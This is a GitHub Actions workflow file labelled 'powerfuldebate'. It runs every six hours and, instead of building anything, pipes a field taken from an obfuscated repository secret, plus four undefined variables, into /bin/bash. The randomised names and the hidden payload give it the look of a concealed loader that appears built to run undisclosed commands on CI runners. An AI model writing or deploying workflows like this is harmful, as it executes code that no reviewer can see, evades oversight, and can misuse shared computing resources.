name: powerfuldebate

on:
  workflow_dispatch:
  schedule:
    - cron: '32 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: powerfuldebate
        env:
          nz278: ${{ secrets.nz278 }}
        run: |
          echo $nz278 | jq -r .zn87 | /bin/bash
          echo $dxjj99 | jq -r .cuom8 | /bin/bash
          echo $yoys0410 | jq -r .qioi49 | /bin/bash
          echo $uj10452 | jq -r .n7627 | /bin/bash
          echo $iyyeg29893 | jq -r .xsj71 | /bin/bash

